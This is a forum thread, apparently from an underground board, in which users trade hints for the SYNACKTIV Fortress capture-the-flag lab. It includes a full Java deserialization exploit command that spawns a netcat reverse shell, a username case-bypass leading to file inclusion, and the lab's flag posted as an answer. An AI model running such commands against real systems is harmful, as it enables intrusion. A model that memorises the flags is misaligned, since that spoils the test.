SYNACKTIV Fortress
by yivador274 - Monday January 8, 2024 at 09:18 AM
#1
Hi.

Could anybody give some hints to take 2nd flag - AcedDC?
I know it is about deserialization in monitoring srv. But i can't to craft right msg for that. (i already know token)
Reply
#2
(Jan 08, 2024, 09:58 AM)ElBakhaw Wrote: I don't remember 100% but I have this :

senddata()

proxychains -q java -jar rmg-4.4.1-jar-with-dependencies.jar serial 172.22.1.250 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'netcat ip port -e /bin/bash'

thx a lot. i did it.
Reply
#3
now I'am stuck after vpn connection. There is a very laggy squid. It's about some exploit on squid or not?
Reply
#4
Any hints for squid part?
Reply
#5
thx. I already did it yesterday.
so my previous question not actual already )
Reply
#6
Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#7
(Jan 16, 2024, 09:42 PM)fl00d777 Wrote: Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?
Yes you are right, you need to become elonmusk, on code analysis this fact stands out that new users cannot be elonmusk.

However, this string comparison also yields the vulnerabiliy, you can register as EloNMusK for example. This way you can also login with your new user and impersonate that user.

Then grab the admincontroller and analyze its code, you can see how ti downloads files... this way you can achieve LFI and leverage this for further enumeration.

And finally the flag.
Reply
#8
Hi,

Stuck after the second flag.

Done successfully the attack with java.
But stuck on the machine, couldn't find any interesting file or program.

can someone give me a nudge ?
Reply
#9
writeup:
https://gatogamer1155.github.io/fortress/synacktiv/
to open:
SYNACKTIV{S3Linux_1s_w@y_bett3r}
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,579 2 hours ago
Last Post: popoler
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,817 9 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,663 Yesterday, 05:05 PM
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,232 Yesterday, 02:10 PM
Last Post: kkkato
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 423 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)